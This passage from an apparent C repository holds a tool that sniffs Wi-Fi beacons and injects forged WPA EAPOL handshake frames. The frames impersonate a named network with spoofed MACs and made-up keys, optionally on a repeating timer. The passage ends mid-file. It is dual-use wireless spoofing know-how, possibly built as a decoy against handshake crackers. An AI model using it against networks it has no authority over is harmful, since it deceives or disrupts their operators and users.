contributors may be used to endorse or promote products derived from 19 | this software without specific prior written permission. 20 | 21 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 22 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 23 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 24 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 25 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 26 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 27 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 28 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 29 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 30 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 31 | */ 32 | 33 | #define WPA_NONCE_LEN 32 34 | #define ETH_ADDR_LEN 6 35 | #define WPA_PTK_LEN 32 36 | #define WPA_PMK_LEN 32 37 | #define WPA_KEY_LEN 32 38 | #define LEN_MAC 6 39 | #define LEN_NONCE 32 40 | #define LEN_MIC 16 41 | #define LEN_ESSID_MAX 32 42 | #define LEN_ESSID_MIN 8 43 | 44 | #define EAP1_TEMPLATE "\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"\ 45 | "\x08\x02\x3a\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x01"\ 46 | "\xaa\xaa\x03\x00\x00\x00\x88\x8e"\ 47 | "\x02\x03\x00\x5f\x02\x00\x8a\x00\x10\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 48 | #define EAP1_SIZE 144 49 | #define EAP1_OFFSET_SUPMAC 17 50 | #define EAP1_OFFSET_BSSID1 23 51 | #define EAP1_OFFSET_BSSID2 29 52 | #define EAP1_OFFSET_ANONCE 62 53 | 54 | #define EAP2_TEMPLATE "\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x01\x3a\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x65\xaa\xaa\x03\x00\x00\x00\x88\x8e\x02\x03\x00\x75\x02\x01\x0a\x00\x10\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x16\x30\x14\x01\x00\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x02\x0c\x00\x00\x00\x00\x00" 55 | #define EAP2_SIZE 175 56 | #define EAP2_OFFSET_SUPMAC 28 57 | #define EAP2_OFFSET_BSSID1 22 58 | #define EAP2_OFFSET_BSSID2 34 59 | #define EAP2_OFFSET_SNONCE 67 60 | #define EAP2_OFFSET_MIC 131 61 | #define EAP2_OFFSET_CRC 171 62 | #define EAP2_OFFSET_MIC_START 50 63 | #define EAP2_OFFSET_MIC_STOP 121 64 | #define EAP2_OFFSET_CRC_START 18 65 | #define EAP2_OFFSET_CRC_STOP 153 66 | -------------------------------------------------------------------------------- /pesky/eth.h: -------------------------------------------------------------------------------- 1 | /* 2 | BSD 3-Clause License 3 | 4 | Copyright (c) 2017, John Ventura 5 | All rights reserved. 6 | 7 | Redistribution and use in source and binary forms, with or without 8 | modification, are permitted provided that the following conditions are met: 9 | 10 | * Redistributions of source code must retain the above copyright notice, this 11 | list of conditions and the following disclaimer. 12 | 13 | * Redistributions in binary form must reproduce the above copyright notice, 14 | this list of conditions and the following disclaimer in the documentation 15 | and/or other materials provided with the distribution. 16 | 17 | * Neither the name of the copyright holder nor the names of its 18 | contributors may be used to endorse or promote products derived from 19 | this software without specific prior written permission. 20 | 21 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 22 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 23 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 24 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 25 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 26 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 27 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 28 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 29 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 30 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 31 | */ 32 | 33 | #include 34 | // definitions for parsing wifi headers 35 | // specific for wifi probes 36 | 37 | struct wifi_header { 38 | uint8_t type; // subtype (4bits) type (2bits) version (2bits) 39 | uint8_t flags; // 40 | uint16_t duration; 41 | uint8_t dest[6]; 42 | uint8_t src[6]; 43 | uint8_t bssid[6]; 44 | uint16_t seq; 45 | }; 46 | 47 | struct wifi_probe { 48 | uint8_t timestamp[8]; 49 | uint16_t beacon; // time between probes in seconds 50 | uint16_t paramtags; 51 | uint8_t tag[]; 52 | }; 53 | 54 | struct wifi_tag { 55 | uint8_t type; 56 | uint8_t len; 57 | uint8_t contents[]; 58 | }; 59 | 60 | struct radiotap_header { 61 | uint8_t version; 62 | uint8_t pad; 63 | uint16_t len; 64 | uint32_t present; 65 | }; 66 | 67 | #define WIFIHEADER_DSSEND 0x01 68 | #define WIFIHEADER_DSRECV 0x02 69 | #define WIFIHEADER_FRAGMENTS 0x04 // is it a fragment 70 | #define WIFIHEADER_RETRY 0x08 // is this a retransmission 71 | #define WIFIHEADER_PWRMGT 0x10 // STA 72 | #define WIFIHEADER_PROTECT 0x20 // Is data protected 73 | #define WIFIHEADER_ORDER 0x40 // Is data strictly ordered? 74 | 75 | #define BSSIDLEN 0x06 76 | -------------------------------------------------------------------------------- /pesky/getbssid.c: -------------------------------------------------------------------------------- 1 | /* 2 | BSD 3-Clause License 3 | 4 | Copyright (c) 2017, John Ventura 5 | All rights reserved. 6 | 7 | Redistribution and use in source and binary forms, with or without 8 | modification, are permitted provided that the following conditions are met: 9 | 10 | * Redistributions of source code must retain the above copyright notice, this 11 | list of conditions and the following disclaimer. 12 | 13 | * Redistributions in binary form must reproduce the above copyright notice, 14 | this list of conditions and the following disclaimer in the documentation 15 | and/or other materials provided with the distribution. 16 | 17 | * Neither the name of the copyright holder nor the names of its 18 | contributors may be used to endorse or promote products derived from 19 | this software without specific prior written permission. 20 | 21 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 22 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 23 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 24 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 25 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 26 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 27 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 28 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 29 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 30 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 31 | */ 32 | 33 | #include 34 | #include 35 | #include 36 | #include 37 | #include 38 | #include 39 | #include 40 | #include 41 | #include 42 | #include 43 | #include 44 | #include 45 | #include 46 | #include "eth.h" 47 | #include "rand.h" 48 | #include "getbssid.h" 49 | 50 | // return a monitor socket 51 | int getmonsock(char *intname) { 52 | int sock; 53 | struct sockaddr_ll sa; 54 | struct ifreq ifr; 55 | 56 | sock = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL)); 57 | if (sock < 0) { 58 | perror("can't open socket\n"); 59 | exit(1); 60 | } 61 | 62 | strncpy(ifr.ifr_name, intname, IFNAMSIZ); 63 | if (ioctl(sock, SIOCGIFINDEX, &ifr) == -1) { 64 | perror("can't retrieve etherenet index\n"); 65 | exit(1); 66 | } 67 | 68 | memset(&sa, 0x00, sizeof(sa)); 69 | sa.sll_family = PF_PACKET; 70 | sa.sll_protocol = htons(ETH_P_ALL); 71 | sa.sll_ifindex = ifr.ifr_ifindex; 72 | sa.sll_hatype = htons(0x0001); 73 | sa.sll_pkttype = (PACKET_BROADCAST); 74 | sa.sll_halen = 6; 75 | 76 | return (sock); 77 | } 78 | 79 | // find a BSSID/MAC Address associated with an ESSID/Network Name 80 | uint8_t *getbssidfromessid(char *essid, char *intname) { 81 | int sock; 82 | int rval; 83 | uint8_t *pkt; 84 | struct radiotap_header *rth; 85 | struct wifi_header *wh; 86 | struct wifi_probe *wp; 87 | struct wifi_tag *tag; 88 | uint8_t *pos; 89 | uint8_t *bssid; 90 | int pktlen; 91 | sock = getmonsock(intname); 92 | 93 | pkt = (uint8_t *) malloc(MAXPACKET); 94 | if (pkt == NULL) { 95 | perror("can't allocate memory"); 96 | exit(1); 97 | } 98 | bssid = (uint8_t *) malloc(BSSIDLEN); 99 | if (bssid == NULL) { 100 | perror("can't allocate memory"); 101 | exit(1); 102 | } 103 | 104 | 105 | rth = (struct radiotap_header *) pkt; 106 | 107 | // read all the raw packets we can get 108 | for (rval = 0; rval >= 0; rval = read(sock, pkt, MAXPACKET)) { 109 | // if we read a packet, start doing stuff 110 | if (rval > 0) { 111 | pktlen = rval - rth->len; 112 | wh = (struct wifi_header *) (pkt + rth->len); 113 | wp = (struct wifi_probe *) (pkt + rth->len + 114 | sizeof(struct wifi_header)); 115 | tag = (struct wifi_tag *) wp->tag; 116 | pos = (uint8_t *) wp->tag; 117 | // if it's a beacon frame, start processing it 118 | if (wh->type == 0x80) { 119 | // start processing all the tags 120 | // this for loop goes through them 121 | for (pos = (uint8_t *) wp->tag; 122 | pos < (uint8_t *) wp->tag + pktlen; 123 | pos += (tag->len + 2)) { 124 | tag = (struct wifi_tag *) pos; 125 | // if it defines an ESSID 126 | // compare it against the one we oant 127 | if (tag->type == 0x00) { 128 | // if essid matches the one we want 129 | // return the bssid 130 | if (memcmp(essid, tag->contents, strlen(essid)) == 131 | 0) { 132 | memcpy(bssid, wh->bssid, BSSIDLEN); 133 | close(sock); 134 | free(pkt); 135 | return (bssid); 136 | } 137 | } 138 | 139 | } 140 | } 141 | } 142 | } 143 | 144 | 145 | // if we got here, our read loop failed horribly 146 | // just return null and hope for the best 147 | close(sock); 148 | free(pkt); 149 | 150 | return (NULL); 151 | } 152 | -------------------------------------------------------------------------------- /pesky/getbssid.h: -------------------------------------------------------------------------------- 1 | /* 2 | BSD 3-Clause License 3 | 4 | Copyright (c) 2017, John Ventura 5 | All rights reserved. 6 | 7 | Redistribution and use in source and binary forms, with or without 8 | modification, are permitted provided that the following conditions are met: 9 | 10 | * Redistributions of source code must retain the above copyright notice, this 11 | list of conditions and the following disclaimer. 12 | 13 | * Redistributions in binary form must reproduce the above copyright notice, 14 | this list of conditions and the following disclaimer in the documentation 15 | and/or other materials provided with the distribution. 16 | 17 | * Neither the name of the copyright holder nor the names of its 18 | contributors may be used to endorse or promote products derived from 19 | this software without specific prior written permission. 20 | 21 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 22 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 23 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 24 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 25 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 26 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 27 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 28 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 29 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 30 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 31 | */ 32 | 33 | #include 34 | 35 | #define MAXPACKET 0xffff 36 | 37 | 38 | uint8_t *getbssidfromessid(char *essid, char *intname); 39 | -------------------------------------------------------------------------------- /pesky/global.c: -------------------------------------------------------------------------------- 1 | /* 2 | BSD 3-Clause License 3 | 4 | Copyright (c) 2017, John Ventura 5 | All rights reserved. 6 | 7 | Redistribution and use in source and binary forms, with or without 8 | modification, are permitted provided that the following conditions are met: 9 | 10 | * Redistributions of source code must retain the above copyright notice, this 11 | list of conditions and the following disclaimer. 12 | 13 | * Redistributions in binary form must reproduce the above copyright notice, 14 | this list of conditions and the following disclaimer in the documentation 15 | and/or other materials provided with the distribution. 16 | 17 | * Neither the name of the copyright holder nor the names of its 18 | contributors may be used to endorse or promote products derived from 19 | this software without specific prior written permission. 20 | 21 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 22 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 23 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 24 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 25 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 26 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 27 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 28 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 29 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 30 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 31 | */ 32 | 33 | #include 34 | 35 | extern uint8_t *essid; 36 | extern char *intname; 37 | extern uint8_t *localmac; 38 | -------------------------------------------------------------------------------- /pesky/global.h: -------------------------------------------------------------------------------- 1 | /* 2 | BSD 3-Clause License 3 | 4 | Copyright (c) 2017, John Ventura 5 | All rights reserved. 6 | 7 | Redistribution and use in source and binary forms, with or without 8 | modification, are permitted provided that the following conditions are met: 9 | 10 | * Redistributions of source code must retain the above copyright notice, this 11 | list of conditions and the following disclaimer. 12 | 13 | * Redistributions in binary form must reproduce the above copyright notice, 14 | this list of conditions and the following disclaimer in the documentation 15 | and/or other materials provided with the distribution. 16 | 17 | * Neither the name of the copyright holder nor the names of its 18 | contributors may be used to endorse or promote products derived from 19 | this software without specific prior written permission. 20 | 21 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 22 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 23 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 24 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 25 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 26 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 27 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 28 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 29 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 30 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 31 | */ 32 | 33 | #include 34 | 35 | uint8_t *essid; 36 | char *intname; 37 | uint8_t *localmac; 38 | char *channelmask; 39 | -------------------------------------------------------------------------------- /pesky/main.c: -------------------------------------------------------------------------------- 1 | /* 2 | BSD 3-Clause License 3 | 4 | Copyright (c) 2017, John Ventura 5 | All rights reserved. 6 | 7 | Redistribution and use in source and binary forms, with or without 8 | modification, are permitted provided that the following conditions are met: 9 | 10 | * Redistributions of source code must retain the above copyright notice, this 11 | list of conditions and the following disclaimer. 12 | 13 | * Redistributions in binary form must reproduce the above copyright notice, 14 | this list of conditions and the following disclaimer in the documentation 15 | and/or other materials provided with the distribution. 16 | 17 | * Neither the name of the copyright holder nor the names of its 18 | contributors may be used to endorse or promote products derived from 19 | this software without specific prior written permission. 20 | 21 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 22 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 23 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 24 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 25 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 26 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 27 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 28 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 29 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 30 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 31 | */ 32 | 33 | #include 34 | #include 35 | #include 36 | #include 37 | #include 38 | #include "network.h" 39 | #include "getbssid.h" 40 | #include "eapmap.h" 41 | #include "rand.h" 42 | #include "eap.h" 43 | 44 | // convert an ethernet MAC or BSSID to a 6 byte buffer 45 | // hopefully, the user can choose to use colons or not 46 | // hopefullly it is also case insensitiive 47 | uint8_t *asciitomac(char *macstr) { 48 | int i; 49 | char bytebuf[3]; 50 | uint8_t *mac; 51 | char *endptr; 52 | 53 | if (strlen(macstr) < 12) { 54 | return (NULL); 55 | } 56 | endptr = macstr + strlen(macstr); 57 | 58 | mac = (uint8_t *) malloc(LEN_MAC); 59 | if (mac == NULL) { 60 | perror("can't allocate memory"); 61 | exit(1); 62 | } 63 | 64 | for (i = 0; i < LEN_MAC; i++) { 65 | bytebuf[0] = *macstr++; 66 | bytebuf[1] = *macstr++; 67 | bytebuf[2] = 0x00; 68 | if (macstr[0] == ':') { 69 | *macstr++; 70 | } 71 | if (macstr > endptr) 72 | return (NULL); 73 | mac[i] = strtoul(bytebuf, NULL, 16); 74 | } 75 | 76 | return (mac); 77 | } 78 | 79 | int usage(char *progname) { 80 | printf("Usage:\n"); 81 | printf("%s\n", progname); 82 | printf("\t-h\tDisplays this message\n"); 83 | printf("\t-b\tBSSID of the AP\t(example: 00:01:02:0a:0b:0c)\n"); 84 | printf("\t-e\tESSID of the wireless network\n"); 85 | printf("\t-c\tWi-Fi channel to use\n"); 86 | printf("\t-i\tinterface to use\t(example: wlan0)\n"); 87 | printf 88 | ("\t-p\taverage (probabilistic) time (in seconds) between fake handshakes\n"); 89 | printf 90 | ("\t-t\tabsolute (deterministic) time interval (in seconds) between fake handshakes\n"); 91 | 92 | 93 | 94 | return (0); 95 | } 96 | 97 | int main(int argc, char *argv[]) { 98 | int c; // needed to parse command line 99 | int seconds = 0; // wait time in seconds 0 == just send it now 100 | int prob = 0; // are we using deterministic or probabilistic wait time 101 | int sleeptime; // actual sleep time between transmissions 102 | 103 | int channel = 0; // WiFi channel we want to use 104 | char *psk = NULL; // network password 105 | char *essid = NULL; // name of network we are impersonating 106 | char *intname = "mon0"; // name of wifie interface we use 107 | 108 | uint8_t *bssid = NULL; // Access Point (AP) MAC address 109 | uint8_t *supmac = NULL; // fake client's MAC address 110 | 111 | while ((c = getopt(argc, argv, "c:k:b:e:ht:p:i")) != -1) { 112 | switch (c) { 113 | case 'b': // set the BSSID 114 | bssid = asciitomac(optarg); 115 | if (bssid == NULL) { 116 | fprintf(stderr, "Can't read BSSID\n"); 117 | } 118 | break; 119 | case 'e': // set the ESSID (network name) 120 | essid = optarg; 121 | if (essid != NULL) { 122 | strtok(essid, "\n\r"); // get rid of trailing CRs 123 | } 124 | break; 125 | case 'k': // PSK to use 126 | psk = optarg; 127 | break; 128 | case 'c': // set the channel 129 | channel = atoi(optarg); 130 | break; 131 | case 't': // send EAP every "t" seconds 132 | seconds = atoi(optarg); 133 | break; 134 | case 'p': // send EAP every "t" seconds on average 135 | seconds = atoi(optarg); 136 | break; 137 | case 'i': // what interface do you want to use? 138 | intname = optarg; 139 | break; 140 | case 'h': // probably help 141 | usage(argv[0]); 142 | exit(0); 143 | break; 144 | default: 145 | break; 146 | } 147 | } 148 | if((bssid == NULL) && (essid == NULL)) { 149 | usage(argv[0]); 150 | exit(0); 151 | } 152 | 153 | // allow user to use iwconfig to set the channel 154 | // or set it here 155 | if (channel != 0) { 156 | setmonitor(intname); 157 | setchannel(intname, channel); 158 | } 159 | // if we didn't set the BSSID set it here 160 | // if ESSID is set, then query the air for the BSSID 161 | if ((bssid == NULL) && (essid != NULL)) { 162 | bssid = getbssidfromessid(essid, intname); 163 | } 164 | // make up a BSSID, if we have to 165 | if (bssid == NULL) { 166 | bssid = (uint8_t *) malloc(LEN_MAC); 167 | if (bssid == NULL) { 168 | perror("can't allocate memory"); 169 | exit(1); 170 | } 171 | fillbuf(bssid, LEN_MAC); 172 | } 173 | // pick out a PSK from command line or make one up 174 | if (psk == NULL) { 175 | psk = (char *) malloc(64); // 64 characters is max len for WPA2 PSKs 176 | if (psk == NULL) { 177 | perror("can't allocate memory"); 178 | exit(1); 179 | } 180 | fillstr(psk, 20, CHAREVERYTHING); 181 | psk[20] = 0x00; 182 | } else { 183 | // if the PSK is at the end of the command line we will have annoying CRs 184 | strtok(psk, "\n\r"); // get rid of trailing CRs 185 | } 186 | // thie is the client's MAC address 187 | if (supmac == NULL) { 188 | supmac = (uint8_t *) malloc(LEN_MAC); 189 | if (supmac == NULL) { 190 | perror("can't allocate memory"); 191 | exit(1); 192 | } 193 | fillbuf(supmac, LEN_MAC); 194 | } 195 | // if we didn't define a time, just send it once 196 | if (seconds == 0) { 197 | sendeap(bssid, supmac, essid, psk, intname); 198 | } else { 199 | // send the EAPs in a loop 200 | for (;;) { 201 | 202 | sendeap(bssid, supmac, essid, psk, intname); 203 | // if we are using probilistic time, make sleep time random 204 | // otherwise, set it to "seconds" 205 | if (prob) { 206 | sleeptime = getrand16() % (seconds * 2); 207 | } else { 208 | sleeptime = seconds; 209 | } 210 | sleep(sleeptime); 211 | } 212 | } 213 | free(bssid); 214 | 215 | return (0); 216 | } 217 | -------------------------------------------------------------------------------- /pesky/network.c: -------------------------------------------------------------------------------- 1 | /* 2 | BSD 3-Clause License 3 | 4 | Copyright (c) 2017, John Ventura 5 | All rights reserved. 6 | 7 | Redistribution and use in source and binary forms, with or without 8 | modification, are permitted provided that the following conditions are met: 9 | 10 | * Redistributions of source code must retain the above copyright notice, this 11 | list of conditions and the following disclaimer. 12 | 13 | * Redistributions in binary form must reproduce the above copyright notice, 14 | this list of conditions and the following disclaimer in the documentation 15 | and/or other materials provided with the distribution. 16 | 17 | * Neither the name of the copyright holder nor the names of its 18 | contributors may be used to endorse or promote products derived from 19 | this software without specific prior written permission. 20 | 21 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 22 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 23 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 24 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 25 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 26 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 27 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 28 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 29 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 30 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 31 | */ 32 | 33 | #include 34 | #include 35 | #include 36 | #include 37 | #include 38 | #include 39 | #include 40 | #include 41 | #include 42 | #include 43 | #include 44 | #include 45 | #include 46 | #include 47 | #include 48 | #include 49 | #include 50 | #include 51 | #include "table.h" 52 | 53 | // send a packet starting at *buf of buflen bytes 54 | // to the network through the interface defined in intname 55 | int sendframe(uint8_t * buf, int buflen, char *intname) { 56 | int sd; 57 | struct sockaddr_ll sa; 58 | struct ifreq ifr; 59 | 60 | sd = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL)); 61 | if (sd < 0) { 62 | perror("can't open socket\n"); 63 | exit(1); 64 | } 65 | printf("%s\n", intname); 66 | strncpy(ifr.ifr_name, intname, IFNAMSIZ); 67 | if (ioctl(sd, SIOCGIFINDEX, &ifr) == -1) { 68 | perror("can't retrieve etherenet index\n"); 69 | exit(1); 70 | } 71 | 72 | memset(&sa, 0x00, sizeof(sa)); 73 | sa.sll_family = PF_PACKET; 74 | sa.sll_protocol = htons(ETH_P_ALL); 75 | sa.sll_ifindex = ifr.ifr_ifindex; 76 | sa.sll_hatype = htons(0x0001); 77 | sa.sll_pkttype = (PACKET_BROADCAST); 78 | sa.sll_halen = 6; 79 | sa.sll_addr[6] = 0x00; 80 | sa.sll_addr[7] = 0x00; 81 | 82 | // keep spraying packets until timeout 83 | // if no timeout, just keep going 84 | sendto(sd, buf, buflen, 0, (struct sockaddr *) &sa, sizeof(sa)); 85 | 86 | close(sd); 87 | return (0); 88 | } 89 | 90 | int setchannel(char *intname, int channel) { 91 | int sock; 92 | 93 | struct iwreq *iwr; 94 | 95 | iwr = malloc(sizeof(struct iwreq)); 96 | if (iwr == NULL) { 97 | perror("can't allocate memory"); 98 | exit(1); 99 | } 100 | memset(iwr, 0x00, sizeof(struct iwreq)); 101 | 102 | iwr->u.freq.m = channel; 103 | iwr->u.freq.e = 0; // no fractional frequencies 104 | iwr->u.freq.flags = IW_FREQ_FIXED; // no channel hopping for us 105 | 106 | strncpy(iwr->ifr_name, intname, strlen(intname)); 107 | 108 | if ((sock = socket(AF_INET, SOCK_DGRAM, 0)) < 0) { 109 | perror("can't open socket"); 110 | exit(1); 111 | } 112 | 113 | if (ioctl(sock, SIOCSIWFREQ, iwr) < 0) { 114 | close(sock); 115 | free(iwr); 116 | perror("can't set frequency"); 117 | exit(1); 118 | } 119 | 120 | free(iwr); 121 | close(sock); 122 | 123 | return (0); 124 | } 125 | 126 | uint8_t frequencytochannel(uint16_t frequency) { 127 | int i; 128 | uint8_t rval = 0; 129 | for (i = 0; freqtab[i].frequency != 0; i++) { 130 | if (freqtab[i].frequency == frequency) { 131 | rval = freqtab[i].channel; 132 | } 133 | 134 | } 135 | return (rval); 136 | } 137 | 138 | uint8_t getchannel(char *intname) { 139 | int sock; 140 | uint8_t channel; 141 | struct iwreq 